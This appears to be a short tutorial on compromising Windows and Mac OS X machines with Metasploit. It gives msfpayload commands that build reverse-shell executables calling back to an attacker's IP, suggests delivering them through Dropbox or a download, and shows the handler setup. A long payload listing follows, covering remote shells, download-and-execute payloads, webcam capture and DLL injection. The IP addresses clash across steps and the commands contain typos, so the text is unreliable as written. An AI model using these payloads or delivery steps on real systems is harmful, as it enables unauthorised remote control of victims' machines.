Remote Shell in Windows/Mac OS X with MetasploitThis article shows how a Windows and Mac OS X instance can be compromised using Metasploit. The attacker uses a reverse TCP connection to make a call-back to the attacking host. In this case the attacking host is at 192.168.0.24, and the Mac OS X instance is at 192.168.0.24. Creating the VulnerabilityThe vulnerability will create a call-back from the Windows/Mac OS X instances to Metasploit. So if the attacking host is at 192.168.0.24, and we callback on port 4444, then we create the exploit with: msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.0.24 LPORT=4444 R > osxv msfpayload windows/shell_reverse_tcp LHOST=192.168.0.24 LPORT=4445 R > wind.exe Next we would save this to a shared folder (such as on Dropbox) and then install it on the instances, otherwise it could be downloaded over the Internet. Using MetasploitOnce the exploit is on the device, we can use Metasploit to compromise it. To start the Metasploit console from Kali we run: msfconsole msf> use exploit/multi/hander msf exploit> set payload osx/x86/shell_reverse_tcp msf exploit (handler) > set LHOST 192.168.0.12 msf exploit (handler) > set LPORt 4444 msf exploit (handler) > exploit and for Windows: msfconsole msf> use exploit/multi/hander msf exploit> set payload windows/shell_reverse_tcp msf exploit (handler) > set LHOST 192.168.0.12 msf exploit (handler) > set LPORt 4445 msf exploit (handler) > exploit ConclusionsThis article shows how an intruder can gain access to a Windows/Mac OS X instance remotely, once an exploit has been installed. Range of exploitsmsf exploit(handler) > show payloads Compatible Payloads =================== NameDisclosure Date -- Rank Description ------------------------------------ android/meterpreter/reverse_http normal -- Android Meterpreter, Dalvik Reverse HTTP Stager android/meterpreter/reverse_httpsnormal -- Android Meterpreter, Dalvik Reverse HTTPS Stager android/meterpreter/reverse_tcp -- normal -- Android Meterpreter, Dalvik Reverse TCP Stager android/shell/reverse_http normal -- Command Shell, Dalvik Reverse HTTP Stager android/shell/reverse_httpsnormal -- Command Shell, Dalvik Reverse HTTPS Stager android/shell/reverse_tcp -- normal -- Command Shell, Dalvik Reverse TCP Stager bsd/sparc/shell_bind_tcpnormal -- BSD Command Shell, Bind TCP Inline bsd/sparc/shell_reverse_tcpnormal -- BSD Command Shell, Reverse TCP Inline bsd/x86/execnormal -- BSD Execute Command bsd/x86/metsvc_bind_tcp normal -- FreeBSD Meterpreter Service, Bind TCP bsd/x86/metsvc_reverse_tcp normal -- FreeBSD Meterpreter Service, Reverse TCP Inline bsd/x86/shell/bind_ipv6_tcpnormal -- BSD Command Shell, Bind TCP Stager (IPv6) bsd/x86/shell/bind_tcp -- normal -- BSD Command Shell, Bind TCP Stager bsd/x86/shell/reverse_ipv6_tcpnormal -- BSD Command Shell, Reverse TCP Stager (IPv6) bsd/x86/shell/reverse_tcp -- normal -- BSD Command Shell, Reverse TCP Stager bsd/x86/shell_bind_tcp -- normal -- BSD Command Shell, Bind TCP Inline bsd/x86/shell_bind_tcp_ipv6normal -- BSD Command Shell, Bind TCP Inline (IPv6) bsd/x86/shell_reverse_tcp -- normal -- BSD Command Shell, Reverse TCP Inline bsd/x86/shell_reverse_tcp_ipv6normal -- BSD Command Shell, Reverse TCP Inline (IPv6) cmd/unix/bind_awk normal -- Unix Command Shell, Bind TCP (via AWK) cmd/unix/bind_lua normal -- Unix Command Shell, Bind TCP (via Lua) cmd/unix/bind_netcat normal -- Unix Command Shell, Bind TCP (via netcat) cmd/unix/bind_netcat_gapingnormal -- Unix Command Shell, Bind TCP (via netcat -e) cmd/unix/bind_netcat_gaping_ipv6 normal -- Unix Command Shell, Bind TCP (via netcat -e) IPv6 cmd/unix/bind_nodejs normal -- Unix Command Shell, Bind TCP (via nodejs) cmd/unix/bind_perlnormal -- Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal -- Unix Command Shell, Bind TCP (via perl) IPv6 cmd/unix/bind_rubynormal -- Unix Command Shell, Bind TCP (via Ruby) cmd/unix/bind_ruby_ipv6 normal -- Unix Command Shell, Bind TCP (via Ruby) IPv6 cmd/unix/bind_zsh normal -- Unix Command Shell, Bind TCP (via Zsh) cmd/unix/generic -- normal -- Unix Command, Generic Command Execution cmd/unix/reverse -- normal -- Unix Command Shell, Double Reverse TCP (telnet) cmd/unix/reverse_awk normal -- Unix Command Shell, Reverse TCP (via AWK) cmd/unix/reverse_bashnormal -- Unix Command Shell, Reverse TCP (/dev/tcp) cmd/unix/reverse_bash_telnet_ssl normal -- Unix Command Shell, Reverse TCP SSL (telnet) cmd/unix/reverse_lua normal -- Unix Command Shell, Reverse TCP (via Lua) cmd/unix/reverse_netcat normal -- Unix Command Shell, Reverse TCP (via netcat) cmd/unix/reverse_netcat_gapingnormal -- Unix Command Shell, Reverse TCP (via netcat -e) cmd/unix/reverse_nodejs normal -- Unix Command Shell, Reverse TCP (via nodejs) cmd/unix/reverse_opensslnormal -- Unix Command Shell, Double Reverse TCP SSL (openssl) cmd/unix/reverse_perlnormal -- Unix Command Shell, Reverse TCP (via Perl) cmd/unix/reverse_perl_ssl -- normal -- Unix Command Shell, Reverse TCP SSL (via perl) cmd/unix/reverse_php_sslnormal -- Unix Command Shell, Reverse TCP SSL (via php) cmd/unix/reverse_python normal -- Unix Command Shell, Reverse TCP (via Python) cmd/unix/reverse_python_sslnormal -- Unix Command Shell, Reverse TCP SSL (via python) cmd/unix/reverse_rubynormal -- Unix Command Shell, Reverse TCP (via Ruby) cmd/unix/reverse_ruby_ssl -- normal -- Unix Command Shell, Reverse TCP SSL (via Ruby) cmd/unix/reverse_ssl_double_telnet -- normal -- Unix Command Shell, Double Reverse TCP SSL (telnet) cmd/unix/reverse_zsh normal -- Unix Command Shell, Reverse TCP (via Zsh) cmd/windows/adduser -- normal -- Windows Execute net user /ADD CMD cmd/windows/bind_lua normal -- Windows Command Shell, Bind TCP (via Lua) cmd/windows/bind_perlnormal -- Windows Command Shell, Bind TCP (via Perl) cmd/windows/bind_perl_ipv6 normal -- Windows Command Shell, Bind TCP (via perl) IPv6 cmd/windows/bind_rubynormal -- Windows Command Shell, Bind TCP (via Ruby) cmd/windows/download_eval_vbs normal -- Windows Executable Download and Evaluate VBS cmd/windows/download_exec_vbs normal -- Windows Executable Download and Execute (via .vbs) cmd/windows/generic -- normal -- Windows Command, Generic Command Execution cmd/windows/reverse_lua normal -- Windows Command Shell, Reverse TCP (via Lua) cmd/windows/reverse_perlnormal -- Windows Command, Double Reverse TCP Connection (via Perl) cmd/windows/reverse_powershellnormal -- Windows Command Shell, Reverse TCP (via Powershell) cmd/windows/reverse_rubynormal -- Windows Command Shell, Reverse TCP (via Ruby) generic/custom normal -- Custom Payload generic/debug_trapnormal -- Generic x86 Debug Trap generic/shell_bind_tcp -- normal -- Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp -- normal -- Generic Command Shell, Reverse TCP Inline generic/tight_loopnormal -- Generic x86 Tight Loop java/jsp_shell_bind_tcp normal -- Java JSP Command Shell, Bind TCP Inline java/jsp_shell_reverse_tcp normal -- Java JSP Command Shell, Reverse TCP Inline java/meterpreter/bind_tcp -- normal -- Java Meterpreter, Java Bind TCP Stager java/meterpreter/reverse_http normal -- Java Meterpreter, Java Reverse HTTP Stager java/meterpreter/reverse_httpsnormal -- Java Meterpreter, Java Reverse HTTPS Stager java/meterpreter/reverse_tcp -- normal -- Java Meterpreter, Java Reverse TCP Stager java/shell/bind_tcp -- normal -- Command Shell, Java Bind TCP Stager java/shell/reverse_tcp -- normal -- Command Shell, Java Reverse TCP Stager java/shell_reverse_tcp -- normal -- Java Command Shell, Reverse TCP Inline linux/armle/exec -- normal -- Linux Execute Command linux/armle/shell/bind_tcp normal -- Linux dup2 Command Shell, Bind TCP Stager linux/armle/shell/reverse_tcp normal -- Linux dup2 Command Shell, Reverse TCP Stager linux/armle/shell_bind_tcp normal -- Linux Command Shell, Reverse TCP Inline linux/armle/shell_reverse_tcp normal -- Linux Command Shell, Reverse TCP Inline linux/mipsbe/exec normal -- Linux Execute Command linux/mipsbe/reboot -- normal -- Linux Reboot linux/mipsbe/shell/reverse_tcpnormal -- Linux Command Shell, Reverse TCP Stager linux/mipsbe/shell_bind_tcpnormal -- Linux Command Shell, Bind TCP Inline linux/mipsbe/shell_reverse_tcpnormal -- Linux Command Shell, Reverse TCP Inline linux/mipsle/exec normal -- Linux Execute Command linux/mipsle/reboot -- normal -- Linux Reboot linux/mipsle/shell/reverse_tcpnormal -- Linux Command Shell, Reverse TCP Stager linux/mipsle/shell_bind_tcpnormal -- Linux Command Shell, Bind TCP Inline linux/mipsle/shell_reverse_tcpnormal -- Linux Command Shell, Reverse TCP Inline linux/ppc/shell_bind_tcpnormal -- Linux Command Shell, Bind TCP Inline linux/ppc/shell_reverse_tcpnormal -- Linux Command Shell, Reverse TCP Inline linux/ppc64/shell_bind_tcp normal -- Linux Command Shell, Bind TCP Inline linux/ppc64/shell_reverse_tcp normal -- Linux Command Shell, Reverse TCP Inline linux/x64/exec normal -- Linux Execute Command linux/x64/shell/bind_tcpnormal -- Linux Command Shell, Bind TCP Stager linux/x64/shell/reverse_tcpnormal -- Linux Command Shell, Reverse TCP Stager linux/x64/shell_bind_tcpnormal -- Linux Command Shell, Bind TCP Inline linux/x64/shell_bind_tcp_random_portnormal -- Linux Command Shell, Bind TCP Random Port Inline linux/x64/shell_reverse_tcpnormal -- Linux Command Shell, Reverse TCP Inline linux/x86/chmodnormal -- Linux Chmod linux/x86/exec normal -- Linux Execute Command linux/x86/meterpreter/bind_ipv6_tcp normal -- Linux Meterpreter, Bind TCP Stager (IPv6) linux/x86/meterpreter/bind_nonx_tcp normal -- Linux Meterpreter, Bind TCP Stager linux/x86/meterpreter/bind_tcpnormal -- Linux Meterpreter, Bind TCP Stager linux/x86/meterpreter/reverse_ipv6_tcp normal -- Linux Meterpreter, Reverse TCP Stager (IPv6) linux/x86/meterpreter/reverse_nonx_tcp normal -- Linux Meterpreter, Reverse TCP Stager linux/x86/meterpreter/reverse_tcpnormal -- Linux Meterpreter, Reverse TCP Stager linux/x86/metsvc_bind_tcp -- normal -- Linux Meterpreter Service, Bind TCP linux/x86/metsvc_reverse_tcp -- normal -- Linux Meterpreter Service, Reverse TCP Inline linux/x86/read_file -- normal -- Linux Read File linux/x86/shell/bind_ipv6_tcp normal -- Linux Command Shell, Bind TCP Stager (IPv6) linux/x86/shell/bind_nonx_tcp normal -- Linux Command Shell, Bind TCP Stager linux/x86/shell/bind_tcpnormal -- Linux Command Shell, Bind TCP Stager linux/x86/shell/reverse_ipv6_tcp normal -- Linux Command Shell, Reverse TCP Stager (IPv6) linux/x86/shell/reverse_nonx_tcp normal -- Linux Command Shell, Reverse TCP Stager linux/x86/shell/reverse_tcpnormal -- Linux Command Shell, Reverse TCP Stager linux/x86/shell_bind_ipv6_tcp normal -- Linux Command Shell, Bind TCP Inline (IPv6) linux/x86/shell_bind_tcpnormal -- Linux Command Shell, Bind TCP Inline linux/x86/shell_bind_tcp_random_portnormal -- Linux Command Shell, Bind TCP Random Port Inline linux/x86/shell_reverse_tcpnormal -- Linux Command Shell, Reverse TCP Inline linux/x86/shell_reverse_tcp2 -- normal -- Linux Command Shell, Reverse TCP Inline - Metasm Demo nodejs/shell_bind_tcpnormal -- Command Shell, Bind TCP (via nodejs) nodejs/shell_reverse_tcpnormal -- Command Shell, Reverse TCP (via nodejs) nodejs/shell_reverse_tcp_ssl -- normal -- Command Shell, Reverse TCP SSL (via nodejs) osx/armle/execute/bind_tcp normal -- OS X Write and Execute Binary, Bind TCP Stager osx/armle/execute/reverse_tcp normal -- OS X Write and Execute Binary, Reverse TCP Stager osx/armle/shell/bind_tcpnormal -- OS X Command Shell, Bind TCP Stager osx/armle/shell/reverse_tcpnormal -- OS X Command Shell, Reverse TCP Stager osx/armle/shell_bind_tcpnormal -- Apple iOS Command Shell, Bind TCP Inline osx/armle/shell_reverse_tcpnormal -- Apple iOS Command Shell, Reverse TCP Inline osx/armle/vibrate normal -- Apple iOS iPhone Vibrate osx/ppc/shell/bind_tcp -- normal -- OS X Command Shell, Bind TCP Stager osx/ppc/shell/reverse_tcp -- normal -- OS X Command Shell, Reverse TCP Stager osx/ppc/shell_bind_tcp -- normal -- OS X Command Shell, Bind TCP Inline osx/ppc/shell_reverse_tcp -- normal -- OS X Command Shell, Reverse TCP Inline osx/x64/dupandexecve/bind_tcp normal -- OS X dup2 Command Shell, Bind TCP Stager osx/x64/dupandexecve/reverse_tcp normal -- OS X dup2 Command Shell, Reverse TCP Stager osx/x64/execnormal -- OS X x64 Execute Command osx/x64/say normal -- OS X x64 say Shellcode osx/x64/shell_bind_tcp -- normal -- OS X x64 Shell Bind TCP osx/x64/shell_reverse_tcp -- normal -- OS X x64 Shell Reverse TCP osx/x86/bundleinject/bind_tcp normal -- Mac OS X Inject Mach-O Bundle, Bind TCP Stager osx/x86/bundleinject/reverse_tcp normal -- Mac OS X Inject Mach-O Bundle, Reverse TCP Stager osx/x86/execnormal -- OS X Execute Command osx/x86/isight/bind_tcp normal -- Mac OS X x86 iSight Photo Capture, Bind TCP Stager osx/x86/isight/reverse_tcp normal -- Mac OS X x86 iSight Photo Capture, Reverse TCP Stager osx/x86/shell_bind_tcp -- normal -- OS X Command Shell, Bind TCP Inline osx/x86/shell_reverse_tcp -- normal -- OS X Command Shell, Reverse TCP Inline osx/x86/vforkshell/bind_tcpnormal -- OS X (vfork) Command Shell, Bind TCP Stager osx/x86/vforkshell/reverse_tcpnormal -- OS X (vfork) Command Shell, Reverse TCP Stager osx/x86/vforkshell_bind_tcpnormal -- OS X (vfork) Command Shell, Bind TCP Inline osx/x86/vforkshell_reverse_tcpnormal -- OS X (vfork) Command Shell, Reverse TCP Inline php/bind_perl -- normal -- PHP Command Shell, Bind TCP (via Perl) php/bind_perl_ipv6normal -- PHP Command Shell, Bind TCP (via perl) IPv6 php/bind_phpnormal -- PHP Command Shell, Bind TCP (via PHP) php/bind_php_ipv6 normal -- PHP Command Shell, Bind TCP (via php) IPv6 php/download_exec normal -- PHP Executable Download and Execute php/exec normal -- PHP Execute Command php/meterpreter/bind_tcpnormal -- PHP Meterpreter, Bind TCP Stager php/meterpreter/bind_tcp_ipv6 normal -- PHP Meterpreter, Bind TCP Stager IPv6 php/meterpreter/reverse_tcpnormal -- PHP Meterpreter, PHP Reverse TCP Stager php/meterpreter_reverse_tcpnormal -- PHP Meterpreter, Reverse TCP Inline php/reverse_perl -- normal -- PHP Command, Double Reverse TCP Connection (via Perl) php/reverse_phpnormal -- PHP Command Shell, Reverse TCP (via PHP) python/meterpreter/bind_tcpnormal -- Python Meterpreter, Python Bind TCP Stager python/meterpreter/reverse_http -- normal -- Python Meterpreter, Python Reverse HTTP Stager python/meterpreter/reverse_tcpnormal -- Python Meterpreter, Python Reverse TCP Stager python/shell_reverse_tcpnormal -- Command Shell, Reverse TCP (via python) python/shell_reverse_tcp_ssl -- normal -- Command Shell, Reverse TCP SSL (via python) ruby/shell_bind_tcp -- normal -- Ruby Command Shell, Bind TCP ruby/shell_bind_tcp_ipv6normal -- Ruby Command Shell, Bind TCP IPv6 ruby/shell_reverse_tcp -- normal -- Ruby Command Shell, Reverse TCP ruby/shell_reverse_tcp_ssl normal -- Ruby Command Shell, Reverse TCP SSL solaris/sparc/shell_bind_tcp -- normal -- Solaris Command Shell, Bind TCP Inline solaris/sparc/shell_reverse_tcp -- normal -- Solaris Command Shell, Reverse TCP Inline solaris/x86/shell_bind_tcp normal -- Solaris Command Shell, Bind TCP Inline solaris/x86/shell_reverse_tcp normal -- Solaris Command Shell, Reverse TCP Inline tty/unix/interact normal -- Unix TTY, Interact with Established Connection windows/dllinject/bind_ipv6_tcp -- normal -- Reflective DLL Injection, Bind TCP Stager (IPv6) windows/dllinject/bind_nonx_tcp -- normal -- Reflective DLL Injection, Bind TCP Stager (No NX or Win7) windows/dllinject/bind_tcp normal -- Reflective DLL Injection, Bind TCP Stager windows/dllinject/bind_tcp_rc4normal -- Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption) windows/dllinject/reverse_hop_http -- normal -- Reflective DLL Injection, Reverse Hop HTTP Stager windows/dllinject/reverse_httpnormal -- Reflective DLL Injection, Reverse HTTP Stager windows/dllinject/reverse_ipv6_tcp -- normal -- Reflective DLL Injection, Reverse TCP Stager (IPv6) windows/dllinject/reverse_nonx_tcp -- normal -- Reflective DLL Injection, Reverse TCP Stager (No NX or Win7) windows/dllinject/reverse_ord_tcpnormal -- Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7) windows/dllinject/reverse_tcp normal -- Reflective DLL Injection, Reverse TCP Stager windows/dllinject/reverse_tcp_allports normal -- Reflective DLL Injection, Reverse All-Port TCP Stager windows/dllinject/reverse_tcp_dnsnormal -- Reflective DLL Injection, Reverse TCP Stager (DNS) windows/dllinject/reverse_tcp_rc4normal -- Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption) windows/dllinject/reverse_tcp_rc4_dns -- normal -- Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS) windows/dns_txt_query_exec normal -- DNS TXT Record Payload Download and Execution windows/download_execnormal -- Windows Executable Download (http,https,ftp) and Execute windows/execnormal -- Windows Execute Command windows/loadlibrary -- normal -- Windows LoadLibrary Path windows/messageboxnormal -- Windows MessageBox windows/meterpreter/bind_ipv6_tcpnormal -- Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6) windows/meterpreter/bind_nonx_tcpnormal -- Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7) windows/meterpreter/bind_tcp -- normal -- Windows Meterpreter (Reflective Injection), Bind TCP Stager windows/meterpreter/bind_tcp_rc4 normal -- Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption) windows/meterpreter/reverse_hop_httpnormal -- Windows Meterpreter (Reflective Injection), Reverse Hop HTTP Stager windows/meterpreter/reverse_http normal -- Windows Meterpreter (Reflective Injection), Reverse HTTP Stager windows/meterpreter/reverse_httpsnormal -- Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager windows/meterpreter/reverse_https_proxynormal -- Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy windows/meterpreter/reverse_ipv6_tcpnormal -- Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6) windows/meterpreter/reverse_nonx_tcpnormal -- Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7) windows/meterpreter/reverse_ord_tcp normal -- Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/meterpreter/reverse_tcp -- normal -- Windows Meterpreter (Reflective Injection), Reverse TCP Stager windows/meterpreter/reverse_tcp_allports -- normal -- Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager windows/meterpreter/reverse_tcp_dns normal -- Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS) windows/meterpreter/reverse_tcp_rc4 normal -- Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption) windows/meterpreter/reverse_tcp_rc4_dnsnormal -- Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS) windows/metsvc_bind_tcp normal -- Windows Meterpreter Service, Bind TCP windows/metsvc_reverse_tcp normal -- Windows Meterpreter Service, Reverse TCP Inline windows/patchupdllinject/bind_ipv6_tcp normal -- Windows Inject DLL, Bind TCP Stager (IPv6) windows/patchupdllinject/bind_nonx_tcp normal -- Windows Inject DLL, Bind TCP Stager (No NX or Win7) windows/patchupdllinject/bind_tcpnormal -- Windows Inject DLL, Bind TCP Stager windows/patchupdllinject/bind_tcp_rc4 -- normal -- Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption) windows/patchupdllinject/reverse_ipv6_tcp normal -- Windows Inject DLL, Reverse TCP Stager (IPv6) windows/patchupdllinject/reverse_nonx_tcp normal -- Windows Inject DLL, Reverse TCP Stager (No NX or Win7) windows/patchupdllinject/reverse_ord_tcp -- normal -- Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7) windows/patchupdllinject/reverse_tcpnormal -- Windows Inject DLL, Reverse TCP Stager windows/patchupdllinject/reverse_tcp_allportsnormal -- Windows Inject DLL, Reverse All-Port TCP Stager windows/patchupdllinject/reverse_tcp_dns -- normal -- Windows Inject DLL, Reverse TCP Stager (DNS) windows/patchupdllinject/reverse_tcp_rc4 -- normal -- Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption) windows/patchupdllinject/reverse_tcp_rc4_dns normal -- Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS) windows/patchupmeterpreter/bind_ipv6_tcp -- normal -- Windows Meterpreter (skape/jt Injection), Bind TCP Stager (IPv6) windows/patchupmeterpreter/bind_nonx_tcp -- normal -- Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7) windows/patchupmeterpreter/bind_tcp normal -- Windows Meterpreter (skape/jt Injection), Bind TCP Stager windows/patchupmeterpreter/bind_tcp_rc4normal -- Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption) windows/patchupmeterpreter/reverse_ipv6_tcp -- normal -- Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6) windows/patchupmeterpreter/reverse_nonx_tcp -- normal -- Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7) windows/patchupmeterpreter/reverse_ord_tcpnormal -- Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/patchupmeterpreter/reverse_tcp normal -- Windows Meterpreter (skape/jt Injection), Reverse TCP Stager windows/patchupmeterpreter/reverse_tcp_allports normal -- Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager windows/patchupmeterpreter/reverse_tcp_dnsnormal -- Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS) windows/patchupmeterpreter/reverse_tcp_rc4normal -- Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption) windows/patchupmeterpreter/reverse_tcp_rc4_dns -- normal -- Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS) windows/shell/bind_ipv6_tcpnormal -- Windows Command Shell, Bind TCP Stager (IPv6) windows/shell/bind_nonx_tcpnormal -- Windows Command Shell, Bind TCP Stager (No NX or Win7) windows/shell/bind_tcp -- normal -- Windows Command Shell, Bind TCP Stager windows/shell/bind_tcp_rc4 normal -- Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption) windows/shell/reverse_hop_httpnormal -- Windows Command Shell, Reverse Hop HTTP Stager windows/shell/reverse_http normal -- Windows Command Shell, Reverse HTTP Stager windows/shell/reverse_ipv6_tcpnormal -- Windows Command Shell, Reverse TCP Stager (IPv6) windows/shell/reverse_nonx_tcpnormal -- Windows Command Shell, Reverse TCP Stager (No NX or Win7) windows/shell/reverse_ord_tcp normal -- Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7) windows/shell/reverse_tcp -- normal -- Windows Command Shell, Reverse TCP Stager windows/shell/reverse_tcp_allports -- normal -- Windows Command Shell, Reverse All-Port TCP Stager windows/shell/reverse_tcp_dns normal -- Windows Command Shell, Reverse TCP Stager (DNS) windows/shell/reverse_tcp_rc4 normal -- Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption) windows/shell/reverse_tcp_rc4_dnsnormal -- Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS) windows/shell_bind_tcp -- normal -- Windows Command Shell, Bind TCP Inline windows/shell_bind_tcp_xpfwnormal -- Windows Disable Windows ICF, Command Shell, Bind TCP Inline windows/shell_hidden_bind_tcp normal -- Windows Command Shell, Hidden Bind TCP Inline windows/shell_reverse_tcp -- normal -- Windows Command Shell, Reverse TCP Inline windows/speak_pwned -- normal -- Windows Speech API - Say "You Got Pwned!" windows/upexec/bind_ipv6_tcp -- normal -- Windows Upload/Execute, Bind TCP Stager (IPv6) windows/upexec/bind_nonx_tcp -- normal -- Windows Upload/Execute, Bind TCP Stager (No NX or Win7) windows/upexec/bind_tcp normal -- Windows Upload/Execute, Bind TCP Stager windows/upexec/bind_tcp_rc4normal -- Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption) windows/upexec/reverse_hop_http -- normal -- Windows Upload/Execute, Reverse Hop HTTP Stager windows/upexec/reverse_httpnormal -- Windows Upload/Execute, Reverse HTTP Stager windows/upexec/reverse_ipv6_tcp -- normal -- Windows Upload/Execute, Reverse TCP Stager (IPv6) windows/upexec/reverse_nonx_tcp -- normal -- Windows Upload/Execute, Reverse TCP Stager (No NX or Win7) windows/upexec/reverse_ord_tcpnormal -- Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7) windows/upexec/reverse_tcp normal -- Windows Upload/Execute, Reverse TCP Stager windows/upexec/reverse_tcp_allports normal -- Windows Upload/Execute, Reverse All-Port TCP Stager windows/upexec/reverse_tcp_dnsnormal -- Windows Upload/Execute, Reverse TCP Stager (DNS) windows/upexec/reverse_tcp_rc4normal -- Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption) windows/upexec/reverse_tcp_rc4_dns -- normal -- Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS) windows/vncinject/bind_ipv6_tcp -- normal -- VNC Server (Reflective Injection), Bind TCP Stager (IPv6) windows/vncinject/bind_nonx_tcp -- normal -- VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7) windows/vncinject/bind_tcp normal -- VNC Server (Reflective Injection), Bind TCP Stager windows/vncinject/bind_tcp_rc4normal -- VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption) windows/vncinject/reverse_hop_http -- normal -- VNC Server (Reflective Injection), Reverse Hop HTTP Stager windows/vncinject/reverse_httpnormal -- VNC Server (Reflective Injection), Reverse HTTP Stager windows/vncinject/reverse_ipv6_tcp -- normal -- VNC Server (Reflective Injection), Reverse TCP Stager (IPv6) windows/vncinject/reverse_nonx_tcp -- normal -- VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7) windows/vncinject/reverse_ord_tcpnormal -- VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/vncinject/reverse_tcp normal -- VNC Server (Reflective Injection), Reverse TCP Stager windows/vncinject/reverse_tcp_allports normal -- VNC Server (Reflective Injection), Reverse All-Port TCP Stager windows/vncinject/reverse_tcp_dnsnormal -- VNC Server (Reflective Injection), Reverse TCP Stager (DNS) windows/vncinject/reverse_tcp_rc4normal -- VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption) windows/vncinject/reverse_tcp_rc4_dns -- normal -- VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS) windows/x64/exec -- normal -- Windows x64 Execute Command windows/x64/loadlibrary normal -- Windows x64 LoadLibrary Path windows/x64/meterpreter/bind_tcp normal -- Windows x64 Meterpreter, Windows x64 Bind TCP Stager windows/x64/meterpreter/reverse_https -- normal -- Windows x64 Meterpreter, Windows x64 Reverse HTTPS Stager windows/x64/meterpreter/reverse_tcp normal -- Windows x64 Meterpreter, Windows x64 Reverse TCP Stager windows/x64/shell/bind_tcp normal -- Windows x64 Command Shell, Windows x64 Bind TCP Stager windows/x64/shell/reverse_https -- normal -- Windows x64 Command Shell, Windows x64 Reverse HTTPS Stager windows/x64/shell/reverse_tcp normal -- Windows x64 Command Shell, Windows x64 Reverse TCP Stager windows/x64/shell_bind_tcp normal -- Windows x64 Command Shell, Bind TCP Inline windows/x64/shell_reverse_tcp normal -- Windows x64 Command Shell, Reverse TCP Inline windows/x64/vncinject/bind_tcpnormal -- Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager windows/x64/vncinject/reverse_https normal -- Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager windows/x64/vncinject/reverse_tcpnormal -- Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager-- |